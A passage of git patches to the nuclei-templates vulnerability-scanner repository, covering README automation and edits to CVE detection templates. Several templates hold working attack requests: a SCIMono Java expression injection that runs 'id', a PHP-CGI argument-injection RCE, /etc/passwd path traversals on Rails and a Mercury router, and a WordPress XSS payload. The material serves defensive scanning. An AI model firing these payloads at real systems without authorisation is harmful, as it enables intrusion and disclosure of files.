capture_output=True).stdout.split("\n")[start:end])[:-1] def get_top10(): + HEADER = "## Top 10 Contributors\n\n" TOP10 = command(["cat", "TOP-10.md"]) - return "## Top 10 Contributors\n\n" + TOP10 if len(TOP10) > 0 else "" + return HEADER + TOP10 if len(TOP10) > 0 else "" if __name__ == "__main__": version = command(["git", "describe", "--tags", "--abbrev=0"]) From aec5340126d0b148addcf911cd7308617f34d03d Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 15:22:20 +0700 Subject: [PATCH 129/149] Revert scheduled trigger --- .github/workflows/templates-stats.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index e647edb2f5..a701cd34d1 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,8 +1,9 @@ name: 🗒 Templates Stats on: - schedule: - - cron: "0 0 * * *" + create: + tags: + - v* workflow_dispatch: jobs: From 0af69ac0fdf8364ef66b2c8047c41571ce0f2c22 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:15:45 +0530 Subject: [PATCH 130/149] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index e6fc7a8ee6..3fa32c53bd 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -24,6 +24,3 @@ requests: - "has invalid value!" part: body condition: and - - type: status - status: - - 400 From b10b8a61b845ac81e591fa0ca991341c09a2eb53 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:16:30 +0530 Subject: [PATCH 131/149] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 3fa32c53bd..490f5cbf73 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -15,7 +15,6 @@ requests: path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" - matchers-condition: and matchers: - type: word words: From d738d2c9a30cb3926be2441fab60599f22e08a91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:18:21 +0530 Subject: [PATCH 132/149] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 490f5cbf73..5aded3fcc7 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -21,5 +21,6 @@ requests: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" + - '"status" : "400"' part: body condition: and From c63bb91bdbfa4888c549daf4193f89c9129d434f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 15:52:10 +0700 Subject: [PATCH 133/149] Create CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-23241.yaml diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml new file mode 100644 index 0000000000..e5356a9692 --- /dev/null +++ b/cves/2021/CVE-2021-23241.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-23241 + +info: + name: Mercury Router Web Server Directory Traversal + author: daffainfo + severity: medium + reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + tags: cve,cve2021,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/loginLess/../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 1fc173982d241e8957a13fab6aa45cf504f62439 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:22:31 +0530 Subject: [PATCH 134/149] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5aded3fcc7..5d60f46f48 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -8,7 +8,7 @@ info: description: | In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. - tags: cve,cve2021,scim,rce + tags: cve,cve2021,scimono,rce requests: - method: GET From 86a7fad73a1ee7f3d92cd214124b6323b1ae22ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:23:39 +0530 Subject: [PATCH 135/149] Update CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index e5356a9692..fe90d59dcc 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - tags: cve,cve2021,iot,lfi + tags: cve,cve2021,iot,lfi,router requests: - method: GET From 41c9c3e3f9fe69bc7de6da96a628827b57298df4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 14:25:37 +0530 Subject: [PATCH 136/149] Update CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index fe90d59dcc..e65d7120b2 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -4,7 +4,11 @@ info: name: Mercury Router Web Server Directory Traversal author: daffainfo severity: medium - reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. + reference: | + - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 +reference: tags: cve,cve2021,iot,lfi,router requests: From 89f06194198016aa4a4041be72b3ce4f983ce858 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Jul 2021 09:15:09 +0000 Subject: [PATCH 137/149] Auto Update README [Tue Jul 20 09:15:09 UTC 2021] :robot: --- README.md | 32 +++++++++++++++++++++++++------- 1 file changed, 25 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 740381b4d9..6d946b7ac1 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,9 @@ Nuclei Templates ---- -Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. This repository stores various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. +This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community. +We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. ## Nuclei Templates overview @@ -38,42 +40,58 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 468 | vulnerabilities | 234 | exposed-panels | 202 | +| cves | 475 | vulnerabilities | 229 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1604 files**. +**134 directories, 1609 files**. +## Top 10 Contributors +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | +| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | +| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | +| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | +| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | | +| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | +| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | +| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | +| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | +| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | 📖 Documentation ----- Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. -We have also added a set of example templates to help you understand how things work. +We have also added a set of templates to help you understand how things work. 💪 Contributions ----- -Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +Nuclei-templates is powered by major contributions from the community. +[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. 💬 Discussion ----- -Have questions / doubts / ideas to discuss? Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. +Have questions / doubts / ideas to discuss? +Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. 👨‍💻 Community ----- -You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. +You are welcome to join our [Discord Community](https://discord.gg/KECAGdH). +You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. 💡 Notes ----- From 2b156573bd42be06eae71ed23d71e61d030cb747 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 20 Jul 2021 16:22:18 +0700 Subject: [PATCH 138/149] Update CVE-2018-3760.yaml --- cves/2018/CVE-2018-3760.yaml | 43 +++++++++++++++++++++++++++--------- 1 file changed, 33 insertions(+), 10 deletions(-) diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 779c5ee4ec..26e04286ed 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -1,22 +1,45 @@ id: CVE-2018-3760 info: - name: Rails CVE-2018-3760 - author: 0xrudra + name: Ruby On Rails Path Traversal + author: 0xrudra,pikpikcu severity: high + reference: | + - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + - https://seclists.org/oss-sec/2018/q2/210 + - https://xz.aliyun.com/t/2542 + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi requests: - - method: GET - path: - - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" + - raw: + - | + GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + + - | + GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + + extractors: + - type: regex + name: path + internal: true + part: body + regex: + - "/etc/passwd is no longer under a load path: (.*?)," - matchers-condition: and matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 - - type: regex - regex: - - "root:[x*]:0:0:" - part: body From e9f9325fd0f7c60475dfd044e9e6198f0160a5de Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 20 Jul 2021 16:32:27 +0700 Subject: [PATCH 139/149] Create CVE-2012-1823.yaml --- cves/2012/CVE-2012-1823.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2012/CVE-2012-1823.yaml diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml new file mode 100644 index 0000000000..1d71ce7da7 --- /dev/null +++ b/cves/2012/CVE-2012-1823.yaml @@ -0,0 +1,35 @@ +id: CVE-2012-1823 + +info: + name: PHP CGI v5.3.12/5.4.2 RCE + author: pikpikcu + severity: critical + reference: | + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 + - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 + description: | + sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + tags: rce,php,cve,cve2012 + +requests: + - raw: + - | + POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/x-www-form-urlencoded + Content-Length: 31 + + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 8f8105bb99a62c717938262f56781798dab4a668 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 16:00:00 +0530 Subject: [PATCH 140/149] Update CVE-2021-23241.yaml --- cves/2021/CVE-2021-23241.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index e65d7120b2..7924ec3b46 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -8,7 +8,6 @@ info: reference: | - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 -reference: tags: cve,cve2021,iot,lfi,router requests: @@ -22,6 +21,7 @@ requests: regex: - "root:[0*]:0:0" part: body + - type: status status: - 200 From b86a6ba59cdd6b1817636e32bac9f340d887921d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 17:14:12 +0530 Subject: [PATCH 141/149] Update vnc-detect.yaml --- network/vnc-detect.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/network/vnc-detect.yaml b/network/vnc-detect.yaml index 36e376c81c..7a0687aefd 100644 --- a/network/vnc-detect.yaml +++ b/network/vnc-detect.yaml @@ -13,4 +13,9 @@ network: matchers: - type: word words: - - "RFB" \ No newline at end of file + - "RFB" + extractors: + - type: regex + part: body + regex: + - "RFB ([0-9.]+)" From f2c22f66b64452b4fde12acfec52bf9201d8dba5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 17:28:29 +0530 Subject: [PATCH 142/149] Update CVE-2018-3760.yaml --- cves/2018/CVE-2018-3760.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 26e04286ed..ff39f6696f 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -35,6 +35,7 @@ requests: regex: - "/etc/passwd is no longer under a load path: (.*?)," + matchers-condition: and matchers: - type: regex regex: From a071981beeffbbf14597a14bf8ce1ddadaf22e7c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 18:33:13 +0530 Subject: [PATCH 143/149] readme update --- .github/scripts/README.tmpl | 20 ++++++++------------ .github/scripts/update-readme.py | 2 +- 2 files changed, 9 insertions(+), 13 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 6c65868500..5f0f630645 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -32,19 +32,19 @@ We hope that you also contribute by sending templates via **pull requests** or [ ## Nuclei Templates overview -An overview of the nuclei template directory including number of templates associated with each directory. +An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
-| Templates | Counts | Templates | Counts | Templates | Counts | -| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} | -| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} | -| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} | -| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} | -| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} | +## Nuclei Templates Top 10 statistics + + + +
+ +{get_top10()} **{command("tree", -2, None)}**. @@ -52,10 +52,6 @@ An overview of the nuclei template directory including number of templates assoc
- -{get_top10()} - - 📖 Documentation ----- diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py index 814459587f..d585617477 100644 --- a/.github/scripts/update-readme.py +++ b/.github/scripts/update-readme.py @@ -9,7 +9,7 @@ def command(args, start=None, end=None): return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1] def get_top10(): - HEADER = "## Top 10 Contributors\n\n" + HEADER = "## Nuclei Templates Top 10 statistics\n\n" TOP10 = command(["cat", "TOP-10.md"]) return HEADER + TOP10 if len(TOP10) > 0 else "" From 9b1a9aaf25b7adc247cf41b53b221effdcbc95d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Jul 2021 13:03:55 +0000 Subject: [PATCH 144/149] Auto Update README [Tue Jul 20 13:03:55 UTC 2021] :robot: --- README.md | 26 +++++++++++--------------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/README.md b/README.md index 6d946b7ac1..7a9a0a09d3 100644 --- a/README.md +++ b/README.md @@ -32,28 +32,19 @@ We hope that you also contribute by sending templates via **pull requests** or [ ## Nuclei Templates overview -An overview of the nuclei template directory including number of templates associated with each directory. +An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration. + +
-| Templates | Counts | Templates | Counts | Templates | Counts | -| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 475 | vulnerabilities | 229 | exposed-panels | 202 | -| takeovers | 70 | exposures | 116 | technologies | 125 | -| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 44 | file | 42 | dns | 10 | -| fuzzing | 10 | helpers | 9 | iot | 18 | +## Nuclei Templates Top 10 statistics -**134 directories, 1609 files**. + + + - -
-
- - -## Top 10 Contributors +## Nuclei Templates Top 10 statistics | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| @@ -68,6 +59,11 @@ An overview of the nuclei template directory including number of templates assoc | wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | | cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | +**134 directories, 1612 files**. + +
📖 Documentation ----- From 76259204a7cc5aa2e0ecc33068d71c2dffa747a3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 18:35:07 +0530 Subject: [PATCH 145/149] Update README.tmpl --- .github/scripts/README.tmpl | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 5f0f630645..0379c746d5 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -38,12 +38,6 @@ An overview of the nuclei template project, including statistics on unique tags,
-## Nuclei Templates Top 10 statistics - - - -
- {get_top10()} **{command("tree", -2, None)}**. From 9c67ac6b4e2c3cb3477511415c74c5a0456ec171 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Jul 2021 13:05:45 +0000 Subject: [PATCH 146/149] Auto Update README [Tue Jul 20 13:05:45 UTC 2021] :robot: --- README.md | 6 ------ 1 file changed, 6 deletions(-) diff --git a/README.md b/README.md index 7a9a0a09d3..1c9fb3a946 100644 --- a/README.md +++ b/README.md @@ -40,12 +40,6 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics - - -
- -## Nuclei Templates Top 10 statistics - | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| | cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | From 1b8ebe74b66c8070fed970ed7ae3c88a3bbad7bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 19:47:19 +0530 Subject: [PATCH 147/149] Update CVE-2016-1000127.yaml --- cves/2016/CVE-2016-1000127.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 9539d37287..459e6c5829 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -4,19 +4,20 @@ info: name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin ajax-random-post v2.00 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c38ada9a7133aa054f45faeaea63253c04a6db79 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 19:50:02 +0530 Subject: [PATCH 148/149] Update CVE-2010-4231.yaml --- cves/2010/CVE-2010-4231.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml index fc754ae86b..0a0c3a1ac7 100644 --- a/cves/2010/CVE-2010-4231.yaml +++ b/cves/2010/CVE-2010-4231.yaml @@ -4,7 +4,10 @@ info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high - reference: https://www.exploit-db.com/exploits/15505 + description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 + - https://www.exploit-db.com/exploits/15505 tags: cve,cve2010,iot,lfi requests: From d1eca2b59ecf86fd806e4c09d0ab78ece85f23ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 19:54:23 +0530 Subject: [PATCH 149/149] Update CVE-2010-2307.yaml --- cves/2010/CVE-2010-2307.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index e841195a11..22129fc120 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -4,7 +4,10 @@ info: name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo severity: high - reference: https://www.securityfocus.com/bid/40550/info + description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + reference: | + - https://www.securityfocus.com/bid/40550/info + - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 tags: cve,cve2010,iot,lfi requests: